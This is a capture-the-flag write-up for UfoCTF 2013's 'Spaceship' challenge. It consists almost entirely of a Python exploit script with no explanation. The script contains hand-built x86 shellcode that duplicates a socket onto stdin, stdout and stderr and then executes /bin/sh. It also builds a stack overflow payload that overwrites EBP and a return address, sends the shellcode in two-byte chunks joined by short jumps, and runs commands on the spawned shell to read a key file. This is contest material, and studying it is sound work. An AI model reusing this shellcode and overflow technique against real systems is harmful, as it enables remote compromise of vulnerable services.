UfoCTF 2013 Spaceship Write-up

1. # aXs^Big-Daddy - http://codezen.fr
2. import socket
3. import telnetlib
4. from struct import pack,unpack
5. import time
6.  
7. shellcode = ''
8.  
9. # Save ptr to stack
10.  
11. shellcode += "\x89\xcf" #   mov edi,ecx
12.  
13. # dup2(4,x)
14.  
15. shellcode += "\x31\xc0" #   xor eax,eax
16. shellcode += "\x31\xdb" #   xor ebx,ebx
17. shellcode += "\x31\xc9" #   xor ecx,ecx
18. shellcode += "\xb1\x02" #   mov cl, 0x2
19. shellcode += "\xb0\x3f" #   mov al, 0x3f
20. shellcode += "\xb3\x04" #   mov bl, 0x4
21. shellcode += "\xcd\x80" #   int 80h
22. shellcode += "\xb1\x01" #   mov cl, 0x1
23. shellcode += "\xb0\x3f" #   mov al, 0x3f
24. shellcode += "\xb3\x04" #   mov bl, 0x4
25. shellcode += "\xcd\x80" #   int 80h
26. shellcode += "\xb1\x00" #   mov cl, 0x0
27. shellcode += "\xb0\x3f" #   mov al, 0x3f
28. shellcode += "\xb3\x04" #   mov bl, 0x4
29. shellcode += "\xcd\x80" #   int 80h
30.  
31. # execve
32.  
33. shellcode += "\x89\xfb" #   mov    ebx,edi
34.  
35. shellcode += "\x31\xc9" #   xor    ecx,ecx
36.  
37. shellcode += "\xf7\xe1" #   mul    ecx
38.  
39. shellcode += "\xb0\x0b" #   mov    al,0xb
40.  
41. shellcode += "\x90\x51" #   push   ecx
42.  
43. shellcode += "\x01\xC3" #   add    ebx,eax
44.  
45. shellcode += "\x43\x43" #   inc    ebx ; inc ebx
46. shellcode += "\x43\x43" #   inc    ebx ; inc ebx
47. shellcode += "\x43\x43" #   inc    ebx ; inc ebx
48. shellcode += "\x43\x43" #   inc    ebx ; inc ebx
49. shellcode += "\x43\x90" #   inc    ebx
50.  
51. shellcode += "\x89\xDF" #   mov edi,ebx
52. shellcode += "\x47\x47" #   inc edi;inc edi
53. shellcode += "\x47\x47" #   inc edi;inc edi
54. shellcode += "\x47\x47" #   inc edi;inc edi
55. shellcode += "\x47\x90" #   inc edi
56.  
57. shellcode += "\x31\xc0" #   xor eax,eax
58.  
59. shellcode += "\xAA\x90" #   stosb
60.  
61. shellcode += "\xb0\x0b" #   mov    al,0xb
62.  
63. shellcode += "\xcd\x80" #   int    0x80
64.  
65. # filler
66.  
67. shellcode += "\x90" * 256
68.  
69. host = 'spaceship.tasks.ufoctf.ru'
70. port = 4141
71.  
72. tn = telnetlib.Telnet(host, port)
73.  
74. time.sleep(1)
75.  
76. s = tn.get_socket()
77.  
78. print tn.read_until("Name your spaceship:")
79.  
80. message  = "/bin/sh\xFF" # shipname
81. message += 'Y' * 4 # ptr, will be overwritten
82. message += pack('<I', 4) # fd
83. message += 'Z' * 4
84. message += pack('<I', 0x0804B074) # EBP
85. #message += pack('<I', 0xbfffeea4) # jump to shellcode
86. message += pack('<I', 0xbfe67e24) # jump to shellcode
87.  
88. s.send(message)
89.  
90. print tn.read_until("Build your ship:\n")
91.  
92. for i in xrange(0,75):
93.     message = shellcode[(74-i)*2:(74-i)*2+2] + "\xEB\x2C"
94.     print i, repr(message)
95.     s.send(message)
96.  
97. time.sleep(3)
98.  
99. while True:
100.     a = s.recv(1)
101.     if a == "\xFF":
102.         break
103.  
104. ptr = unpack('<I', s.recv(4))[0]
105. print "ptr=", hex(ptr)
106. print "dummy=", s.recv(8)
107. ptr = unpack('<I', s.recv(4))[0]
108. print "ptr=", hex(ptr)
109. ptr = unpack('<I', s.recv(4))[0]
110. print "ptr=", hex(ptr)
111.  
112. time.sleep(3)
113.  
114. s.send("ls -la;cat k3y\n")
115.  
116. while True:
117.     data = s.recv(1024)
118.     if data:
119.         print data
120.     else:
121.         break